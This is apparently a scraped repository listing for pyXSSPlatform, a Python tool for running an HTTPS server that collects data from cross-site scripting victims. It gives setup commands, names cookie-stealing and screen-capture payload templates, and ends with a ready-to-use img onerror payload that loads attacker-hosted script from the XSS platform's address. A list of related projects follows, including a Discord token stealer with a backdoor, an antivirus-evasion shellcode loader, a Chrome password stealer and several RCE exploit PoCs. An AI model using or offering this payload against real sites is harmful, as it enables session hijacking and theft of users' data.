Used to build an XSS platform on the command line.

Last update: Jun 21, 2022

Overview

pyXSSPlatform

Used to build an XSS platform on the command line.

Usage:

1.generate the cert file

You can use openssl like this:

openssl req -new -x509 -keyout https_svr_key.pem -out https_svr_key.pem -days 3650 -nodes

2.add your js code to index.js

You can refer to the files in Payload_Template folder

Payload:

GetCookie
CaptureScreen
GET/POST

3.start the HTTPS server

pyXSSPlatform.py <listen address> <listen port> <cert file>

Eg.

pyXSSPlatform.py 0.0.0.0 443 https_svr_key.pem

Finally, you can try the following pyaload :

<img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="https://<your XSSPlatform ip>/index.js"></img>

Owner

good in study,attitude and health.

GitHub Repository

SpiderFoot automates OSINT collection so that you can focus on analysis.

SpiderFoot is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of m

9k Jan 08, 2023

python写的一款免杀工具（shellcode加载器）BypassAV，国内杀软全过（windows denfend）

266 Jan 02, 2023

Separate handling of protected media in Django, with X-Sendfile support

Django Protected Media Django Protected Media is a Django app that manages media that are considered sensitive in a protected fashion. Not only does t

46 Nov 12, 2022

Create a secure tunnel from a custom domain to localhost using Fly and WireGuard.

Fly Dev Tunnel Developers commonly use apps like ngrok, localtunnel, or cloudflared to expose a local web service at a publicly-accessible URL. This i

170 Dec 11, 2022

Bypass 4xx HTTP response status codes.

Forbidden Bypass 4xx HTTP response status codes. To see all the test cases, check the source code - follow the NOTE comments. Script uses multithreadi

165 Dec 28, 2022

PoC for CVE-2021-45897 aka SCRMBT-#180 - RCE via Email-Templates (Authenticated only) in SuiteCRM <= 8.0.1

CVE-2021-45897 PoC for CVE-2021-45897 aka SCRMBT-#180 - RCE via Email-Templates (Authenticated only) in SuiteCRM = 8.0.1 This vulnerability was repor

17 Nov 09, 2022

Python bindings to LibreSSL library

LibreSSL bindings for Python using CFFI Python3 bindings to LibreSSL using CFFI. It aims to provide interface to the most important bits of LibreSSL o

1 Aug 02, 2022

Fat-Stealer is a stealer that allows you to grab the Discord token from a user and open a backdoor in his machine.

21 Jan 01, 2023

CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection

CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection Usage usage: cve-2021-26084_confluence_rce.py [-h] --url URL [--cmd CMD] [--shell] CVE-2021-2

92 Jul 20, 2022

Convert a collection of features to a fixed-dimensional matrix using the hashing trick.

FeatureHasher Convert a collection of features to a fixed-dimensional matrix using the hashing trick. Note, this requires Jina=2.2.4. Example Here I

5 Mar 15, 2022

Searches through git repositories for high entropy strings and secrets, digging deep into commit history

truffleHog Searches through git repositories for secrets, digging deep into commit history and branches. This is effective at finding secrets accident

10.1k Jan 09, 2023

Argument Injection in Dragonfly Ruby Gem

CVE-2021-33564 PoC Exploit script for CVE-2021-33564 (Argument Injection in Dragonfly Ruby Gem). Usage Arbitrary File Read python3 poc.py -u https://

12 Nov 09, 2022

Tenssens framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources.

31 Oct 21, 2022

the metasploit script(POC/EXP) about CVE-2021-22005 VMware vCenter Server contains an arbitrary file upload vulnerability

CVE-2021-22005-metasploit the metasploit script(POC/EXP) about CVE-2021-22005 VMware vCenter Server contains an arbitrary file upload vulnerability pr

25 Nov 15, 2022

Chrome Post-Exploitation is a client-server Chrome exploit to remotely allow an attacker access to Chrome passwords, downloads, history, and more.

ChromePE [Linux/Windows] Chrome Post-Exploitation is a client-server Chrome exploit to remotely allow an attacker access to Chrome passwords, download

3 Oct 05, 2022

Used to build an XSS platform on the command line.

Related tags

Overview

pyXSSPlatform

Owner

SpiderFoot automates OSINT collection so that you can focus on analysis.

python写的一款免杀工具（shellcode加载器）BypassAV，国内杀软全过（windows denfend）

Separate handling of protected media in Django, with X-Sendfile support

Create a secure tunnel from a custom domain to localhost using Fly and WireGuard.

Bypass 4xx HTTP response status codes.

PoC for CVE-2021-45897 aka SCRMBT-#180 - RCE via Email-Templates (Authenticated only) in SuiteCRM <= 8.0.1

Python bindings to LibreSSL library

Fat-Stealer is a stealer that allows you to grab the Discord token from a user and open a backdoor in his machine.

CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection

Convert a collection of features to a fixed-dimensional matrix using the hashing trick.

Searches through git repositories for high entropy strings and secrets, digging deep into commit history

Argument Injection in Dragonfly Ruby Gem

Tenssens framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources.

the metasploit script(POC/EXP) about CVE-2021-22005 VMware vCenter Server contains an arbitrary file upload vulnerability

A piece of software that shows a traceroute of a URL redirect path

A secure password generator written in python

Windows Server 2016, 2019, 2022 Extracter & Recovery

Python lib to automate basic QFT calculations like Wick-contractions.

🎻 Modularized exploit generation framework

Chrome Post-Exploitation is a client-server Chrome exploit to remotely allow an attacker access to Chrome passwords, downloads, history, and more.